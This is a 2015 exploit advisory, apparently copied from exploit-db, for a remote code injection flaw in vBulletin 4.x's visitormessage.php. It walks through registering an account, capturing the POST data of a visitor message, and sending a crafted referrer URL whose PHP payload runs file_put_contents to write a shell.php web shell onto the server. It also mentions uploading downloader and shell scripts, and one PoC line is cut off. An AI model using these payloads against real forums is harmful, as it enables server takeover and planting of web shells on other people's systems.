vBulletin vBSEO 4.x – ‘visitormessage.php’ Remote Code Injection

  • 作者: Net.Edit0r
    日期: 2015-03-02
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/36232/
  • #################################################################################################################
    [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
    [+] Discovered By: Dariush Nasirpour (Net.Edit0r)
    [+] My Homepage: black-hg.org / nasirpour.info
    [+] Date: [2015 27 February]
    [+] Vendor Homepage: vBulletin.com
    [+] Tested on: [vBulletin 4.2.2]
    [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
    Remote Code Injection:
    1) You Must Register In The vBulletin http://server/register.php example:[blackhat]
    2) go to your user profile example: [http://server/members/blackhat.html]
    3) post something in visitor message and record post data with live http header
    [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
    4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX"[because vBulletin don't let you send same comment in a time]
    [Now post this with hackbar:]
    [Post data]
    [And referrer data:] 
    PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    [Example referrer data:] > upload downloader.php and s.php
    PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
    5- Open hackbar and tamper it with taper data:
    referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    and submit request.